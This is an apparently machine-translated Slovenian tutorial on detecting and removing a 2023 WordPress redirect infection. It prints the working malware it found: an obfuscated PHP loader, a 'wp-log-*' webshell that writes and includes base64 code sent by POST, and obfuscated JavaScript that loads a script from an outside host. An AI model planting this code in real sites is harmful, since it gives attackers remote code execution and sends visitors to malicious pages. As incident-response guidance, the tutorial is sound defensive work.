Fix Redirect WordPress Hack 2023 (Virus Redirect)

WordPress je vsekakor najpogosteje uporabljena platforma CMS (Content Management System) za bloge in začetne spletne trgovine (z modulom WooCommerce), zaradi česar je najbolj tarča računalniških napadov (hekanj). Ena najpogosteje uporabljenih hekerskih operacij je namenjena preusmeritvi ogrožene spletne strani na druge spletne strani. Redirect WordPress Hack 2023 je relativno nova zlonamerna programska oprema, ki vpliva na preusmeritev celotnega spletnega mesta na neželene spletne strani ali pa lahko okuži računalnike uporabnikov.

Če se je vaše spletno mesto razvilo na WordPress je preusmerjen na drugo spletno stran, potem je najverjetneje žrtev že znanega vdora preusmeritve.

V tej vadnici boste našli potrebne informacije in koristne nasvete, s katerimi lahko devirusirate spletno mesto, okuženo s preusmeritvijo WordPress Hack (Virus Redirect). Skozi komentarje lahko dobite dodatne informacije ali zaprosite za pomoč.

Kuprini

Odkrivanje virusa, ki preusmerja spletna mesta WordPress

Nenaden in neupravičen upad obiska spletne strani, upad števila naročil (pri spletnih trgovinah) ali prihodkov od oglaševanja so prvi znaki, da nekaj ni v redu. Odkrivanje "Redirect WordPress Hack 2023” (Preusmeritev virusov) lahko izvedete tudi “vizualno”, ko odprete spletno mesto in ste preusmerjeni na drugo spletno stran.

Po izkušnjah je večina zlonamerne spletne programske opreme združljiva z internetnimi brskalniki: Chrome, Firefox, Edge, Opera. Če ste uporabnik računalnika Mac, ti virusi v brskalniku res niso vidni Safari. Varnostni sistem od Safari tiho blokira te zlonamerne skripte.

Kaj storiti, če imate spletno mesto okuženo z Redirect WordPress Hack

Upam, da prvi korak ni panika ali brisanje spletne strani. Tudi okuženih ali virusnih datotek ne smete najprej izbrisati. Vsebujejo dragocene informacije, ki vam lahko pomagajo razumeti, kje je prišlo do kršitve varnosti in kaj je vplivalo na virus. Način delovanja.

Zaprite spletno mesto za javnost.

Kako zaprete spletno stran z virusi za obiskovalce? Najenostavneje je, da uporabite DNS manager in izbrišete IP za "A" (ime domene) ali določite neobstoječ IP. Tako bodo obiskovalci spletne strani zaščiteni pred tem redirect WordPress hack kar jih lahko pripelje do spletnih strani z virusi ali SPAM.

Če uporabljate CloudFlare kot upravitelj DNS se prijavite v račun in izbrišete zapise DNS "A” za ime domene. Tako bo domena, okužena z virusom, ostala brez IP-ja in do nje ne bo več mogoče dostopati iz interneta.

Kopirate IP spletnega mesta in ga "usmerite", tako da lahko do njega dostopate samo vi. Iz vašega računalnika.

Kako spremeniti pravi IP spletnega mesta na računalnikih Windows?

Metoda se pogosto uporablja za blokiranje dostopa do določenih spletnih mest z urejanjem datoteke "hosts".

1. Odpreš Notepad ali drug urejevalnik besedil (s pravicami administrator) in uredite datoteko "hosts". Nahaja se v:

C:\Windows\System32\drivers\etc\hosts

2. V datoteki "hosts" dodajte "route" pravemu IP-ju vašega spletnega mesta. IP je zgoraj izbrisan iz upravitelja DNS.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Shranite datoteko in odprite spletno stran v brskalniku.

Če se spletna stran ne odpre in v datoteki "hosts" niste storili ničesar narobe, gre najverjetneje za predpomnilnik DNS.

Za brisanje predpomnilnika DNS v operacijskem sistemu Windows, odprto Command Prompt, kjer zaženete ukaz:

ipconfig /flushdns

Kako spremeniti pravi IP spletnega mesta na računalnikih Mac / Macknjiga?

Za uporabnike računalnikov Mac nekoliko preprosteje je spremeniti pravi IP spletnega mesta.

1. Odprite pripomoček Terminal.

2. Zaženite ukazno vrstico (za zagon je potrebno sistemsko geslo):

sudo nano /etc/hosts

3. Enako kot pri računalnikih Windows, dodajte pravi IP domene.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Shranite spremembe. Ctrl+X (y).

Ko ste "usmerjeni", ste edina oseba, ki lahko dostopa do okuženega spletnega mesta Redirect WordPress Hack.

Popolna varnostna kopija spletnega mesta – datoteke in baza podatkov

Tudi če je okužen z "redirect WordPress hack”, priporočamo, da naredite splošno varnostno kopijo celotne spletne strani. Datoteke in baza podatkov. Morda bi lahko shranili tudi lokalno kopijo obeh datotek iz public / public_html kot tudi baza podatkov.

Identifikacija okuženih datotek in datotek, ki jih je spremenil Redirect WordPress Hack 2023

Glavne ciljne datoteke WordPress obstajajo index.php (v korenu), header.php, index.php şi footer.php teme WordPress sredstev. Ročno preverite te datoteke in prepoznajte zlonamerno kodo ali skript zlonamerne programske opreme.

Leta 2023 se je pojavil virus "Redirect WordPress Hack” vstavite index.php kodo obrazca:

(Ne priporočam izvajanja teh kod!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Dekodirano, to zlonamerni skript v bistvu je posledica okužbe spletne strani WordPress. Za zlonamerno programsko opremo ne stoji skript, temveč skript, ki omogoča preusmeritev okužene spletne strani. Če dekodiramo zgornji skript, dobimo:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Če želite prepoznati vse datoteke na strežniku, ki vsebujejo to kodo, je dobro imeti dostop SSH na strežnik za zagon ukaznih vrstic za preverjanje in upravljanje datotek Linux.

Povezano: Kako ugotoviti, ali je vaš blog okužen ali ne, s pomočjo Google Search . (WordPress Virus)

Spodaj sta dva ukaza, ki sta vsekakor v pomoč pri prepoznavanju nedavno spremenjenih datotek in datotek, ki vsebujejo določeno kodo (niz).

Kako vidite naprej Linux Datoteke PHP spremenjene v zadnjih 24 urah ali v kakšnem drugem časovnem okviru?

Naroči “find” je zelo preprost za uporabo in omogoča prilagajanje za nastavitev časovnega obdobja, poti do iskanja in vrste datotek.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

V izhodu boste prejeli informacije o datumu in času spremembe datoteke, dovoljenjih za pisanje / branje / izvajanje (chmod) in kateri skupini/uporabniku pripada.

Če želite preveriti več dni nazaj, spremenite vrednost "-mtime -1« ali uporabite »-mmin -360” minut (6 ur).

Kako poiskati kodo (niz) znotraj datotek PHP, Java?

Ukazna vrstica »find«, ki vam omogoča hitro iskanje vseh datotek PHP ali Java, ki vsebujejo določeno kodo, je naslednja:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Ukaz bo poiskal in prikazal datoteke .php şi .js ki vsebuje "uJjBRODYsU".

S pomočjo zgornjih dveh ukazov boste zelo enostavno ugotovili, katere datoteke so bile pred kratkim spremenjene in katere vsebujejo zlonamerno kodo.

Odstrani zlonamerno kodo iz spremenjenih datotek brez ogrožanja pravilne kode. V mojem scenariju je bila zlonamerna programska oprema nameščena pred odpiranjem <head>.

Pri izvedbi prvega ukaza "najdi" je zelo možno, da na strežniku odkrijete nove datoteke, ki niso vaše WordPress niti ga niste postavili tja. Datoteke, ki pripadajo vrsti virusa Redirect WordPress Hack.

V scenariju, ki sem ga preiskoval, so datoteke v obliki "wp-log-nOXdgD.php". To so »spawn« datoteke, ki vsebujejo tudi zlonamerno kodo, ki jo virus uporablja za preusmeritev.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Namen datotek tipa "wp-log-*” je razširiti preusmeritveni hekerski virus na druga spletna mesta, ki gostujejo na strežniku. Gre za kodo zlonamerne programske opreme tipa "webshell” sestavljen iz a osnovni del (v katerem so definirane nekatere šifrirane spremenljivke) in o izvedbeni del prek katerega poskuša napadalec naložiti in izvesti zlonamerno kodo v sistemu.

Če obstaja spremenljivka POST imenovan 'bh' in njegovo šifrirano vrednost MD5 je enako "8f1f964a4b4d8d1ac3f0386693d28d03«, potem se prikaže skript za pisanje šifrirane vsebine base64 druge spremenljivke, imenovane 'b3' v začasni datoteki in nato poskuša vključiti to začasno datoteko.

Če obstaja spremenljivka POST ali GET imenovan 'tick', bo skript odgovoril z vrednostjo MD5 niza "885".

Če želite identificirati vse datoteke na strežniku, ki vsebujejo to kodo, izberite niz, ki je skupen, nato zaženite ukaz "find” (podobno kot zgoraj). Izbrišite vse datoteke, ki vsebujejo to zlonamerno kodo.

Varnostna napaka, ki jo je izkoristil Redirect WordPress Hack

Najverjetneje ta preusmeritveni virus prispe prek izkoriščanje uporabnika administracije WordPress ali z identifikacijo a ranljiv vtičnik ki omogoča dodajanje uporabnikov s privilegiji administrator.

Za večino spletnih mest, zgrajenih na platformi WordPress je mogoče urejanje datotek tem ali vtičnikoviz skrbniškega vmesnika (Dashboard). Tako lahko zlonamerna oseba doda kodo zlonamerne programske opreme datotekam s tematiko za ustvarjanje zgoraj prikazanih skriptov.

Primer takšne kode zlonamerne programske opreme je ta:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript opredeljeno v glavi teme WordPress, takoj po odprtju etikete <head>.

Ta JavaScript je precej težko dešifrirati, vendar je očitno, da poizveduje po drugem spletnem naslovu, od koder najverjetneje pridobi druge skripte za ustvarjanje datotek.wp-log-*«, o katerem sem govoril zgoraj.

Poiščite in izbrišite to kodo iz vseh datotek PHP prizadeti.

Kolikor sem razumel, je bila ta koda ročno dodano novi uporabnik s skrbniškimi pravicami.

Če želite preprečiti dodajanje zlonamerne programske opreme z nadzorne plošče, je najbolje, da onemogočite možnost urejanja WordPress Teme/vtičniki z nadzorne plošče.

Uredite datoteko wp-config.php in dodajte vrstice:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Po tej spremembi ni nobenega uporabnika WordPress ne boste mogli več urejati datotek na nadzorni plošči.

Preverite uporabnike z vlogo Administrator

Spodaj je poizvedba SQL, ki jo lahko uporabite za iskanje uporabnikov z vlogo administrator v platformi WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Ta poizvedba bo vrnila vse uporabnike v tabeli wp_users ki mu dodelili vlogo administrator. Poizvedba se izvede tudi za tabelo wp_usermeta iskati v meta'wp_capabilities', ki vsebuje informacije o uporabniških vlogah.

Druga metoda je, da jih prepoznate po: Dashboard → Users → All Users → Administrator. Vendar pa obstajajo prakse, s katerimi lahko uporabnika skrijete na nadzorni plošči. Torej, najboljši način za ogled uporabnikov "Administrator"V WordPress je zgornji ukaz SQL.

V mojem primeru sem v bazi podatkov identificiral uporabnika z imenom "wp-import-user". Precej sugestivno.

Slab uporabnik zlonamerne programske opreme WP

Tukaj lahko vidite tudi datum in čas, ko je uporabnik WordPress je bil ustvarjen. ID uporabnika je prav tako zelo pomemben, ker išče po dnevnikih strežnika. Tako lahko vidite vse aktivnosti tega uporabnika.

Izbriši uporabnike z vlogo administrator ki jih torej ne poznate spremenite gesla vsem administrativnim uporabnikom. Urednik, avtor, Administrator.

Spremenite geslo uporabnika baze podatkov SQL prizadetega spletnega mesta.

Po izvedbi teh korakov lahko spletno stran znova zaženete za vse uporabnike.

Ne pozabite pa, da je to, kar sem predstavil zgoraj, eden od morda na tisoče scenarijev, v katerih je spletno mesto okuženo z Redirect WordPress Hack leta 2023.

Če je bilo vaše spletno mesto okuženo in potrebujete pomoč ali če imate kakršna koli vprašanja, je razdelek za komentarje odprt.